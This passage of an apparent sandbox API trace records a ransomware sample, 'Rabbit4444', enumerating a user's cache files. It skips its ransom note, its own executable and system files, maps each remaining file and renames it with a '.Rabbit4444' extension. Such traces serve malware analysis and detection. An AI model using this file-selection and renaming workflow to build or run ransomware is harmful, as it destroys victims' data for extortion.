ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xe9b5bd4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.334] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.334] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.334] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.334] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9b33c44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9b33c44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9b5bd4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.334] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.334] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.334] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdfedb1f6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd81d4ab4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x19c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0054.334] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0054.335] lstrcpyW (in: lpString1=0x130ebc0, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0054.335] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0054.335] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0054.335] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0054.335] lstrlenW (lpString="Rabbit4444") returned 10 [0054.335] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0054.335] lstrlenW (lpString=".dll") returned 4 [0054.335] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0054.335] lstrlenW (lpString=".lnk") returned 4 [0054.335] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0054.335] lstrlenW (lpString=".ini") returned 4 [0054.335] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0054.335] lstrlenW (lpString=".sys") returned 4 [0054.335] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0054.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.335] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.335] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14564614166) returned 1 [0054.335] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6597) returned 1 [0054.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0054.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0054.336] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1cd0, lpName=0x0) returned 0x298 [0054.336] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1cd0) returned 0x70000 [0054.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0054.337] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0054.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0054.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0054.338] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14564848154) returned 1 [0054.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0054.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0054.338] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.338] CloseHandle (hObject=0x298) returned 1 [0054.338] CloseHandle (hObject=0x278) returned 1 [0054.339] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444") returned 111 [0054.339] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\57c8edb95df3f0ad4ee2dc2b8cfd4157.rabbit4444"), dwFlags=0x1) returned 1 [0054.339] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xf750fa79, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf750fa79, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf750fa79, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", cAlternateFileName="6BADA8~1")) returned 1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="Rabbit4444.exe") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2=".") returned 1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="..") returned 1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="windows") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="bootmgr") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="pagefile.sys") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="boot") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="ids.txt") returned -1 [0054.339] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", lpString2="NTUSER.DAT") returned -1 [0054.339] lstrcpyW (in: lpString1=0x130ebc0, lpString2="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4") returned="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" [0054.339] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", dwFileAttributes=0x2020) returned 1 [0054.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4", dwFileAttributes=0x2004) returned 1 [0054.340] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4") returned 65 [0054.340] lstrlenW (lpString="Rabbit4444") returned 10 [0054.340] lstrcmpiW (lpString1="E1FE18FCE4", lpString2="Rabbit4444") returned -1 [0054.340] lstrlenW (lpString=".dll") returned 4 [0054.340] lstrcmpiW (lpString1="FCE4", lpString2=".dll") returned 1 [0054.340] lstrlenW (lpString=".lnk") returned 4 [0054.340] lstrcmpiW (lpString1="FCE4", lpString2=".lnk") returned 1 [0054.340] lstrlenW (lpString=".ini") returned 4 [0054.340] lstrcmpiW (lpString1="FCE4", lpString2=".ini") returned 1 [0054.340] lstrlenW (lpString=".sys") returned 4 [0054.340] lstrcmpiW (lpString1="FCE4", lpString2=".sys") returned 1 [0054.340] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.340] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.340] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14565114290) returned 1 [0054.340] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=471) returned 1 [0054.340] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0054.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0054.341] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0054.342] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0054.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0054.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0054.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0054.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0054.345] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14565530679) returned 1 [0054.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0054.345] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0054.345] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.345] CloseHandle (hObject=0x298) returned 1 [0054.345] CloseHandle (hObject=0x278) returned 1 [0054.345] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4.Rabbit4444") returned 144 [0054.345] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_88614ffad35d353421b8a7e1fe18fce4.rabbit4444"), dwFlags=0x1) returned 1 [0054.345] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5a26ac8b, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x5a26ac8b, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x5a26ac8b, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", cAlternateFileName="6BADA8~3")) returned 1 [0054.345] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.345] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.345] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="Rabbit4444.exe") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".") returned 1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="..") returned 1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="windows") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="bootmgr") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="pagefile.sys") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="boot") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="ids.txt") returned -1 [0054.346] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="NTUSER.DAT") returned -1 [0054.346] lstrcpyW (in: lpString1=0x130ebc0, lpString2="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" [0054.346] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2020) returned 1 [0054.349] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2004) returned 1 [0054.349] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned 65 [0054.349] lstrlenW (lpString="Rabbit4444") returned 10 [0054.349] lstrcmpiW (lpString1="4792417E04", lpString2="Rabbit4444") returned -1 [0054.349] lstrlenW (lpString=".dll") returned 4 [0054.349] lstrcmpiW (lpString1="7E04", lpString2=".dll") returned 1 [0054.349] lstrlenW (lpString=".lnk") returned 4 [0054.349] lstrcmpiW (lpString1="7E04", lpString2=".lnk") returned 1 [0054.349] lstrlenW (lpString=".ini") returned 4 [0054.349] lstrcmpiW (lpString1="7E04", lpString2=".ini") returned 1 [0054.349] lstrlenW (lpString=".sys") returned 4 [0054.349] lstrcmpiW (lpString1="7E04", lpString2=".sys") returned 1 [0054.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.350] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.350] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14566036237) returned 1 [0054.350] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=471) returned 1 [0054.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0054.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0054.350] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0054.354] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0054.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0054.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0054.355] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14566584968) returned 1 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0054.355] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0054.355] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.355] CloseHandle (hObject=0x298) returned 1 [0054.355] CloseHandle (hObject=0x278) returned 1 [0054.355] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444") returned 144 [0054.355] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04.rabbit4444"), dwFlags=0x1) returned 1 [0054.356] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x59ed7426, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x59ed7426, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x59ed7426, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", cAlternateFileName="6BADA8~2")) returned 1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="Rabbit4444.exe") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2=".") returned 1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="..") returned 1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="windows") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="bootmgr") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="pagefile.sys") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="boot") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="ids.txt") returned -1 [0054.356] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="NTUSER.DAT") returned -1 [0054.356] lstrcpyW (in: lpString1=0x130ebc0, lpString2="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203") returned="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" [0054.356] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", dwFileAttributes=0x2020) returned 1 [0054.357] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", dwFileAttributes=0x2004) returned 1 [0054.357] lstrlenW 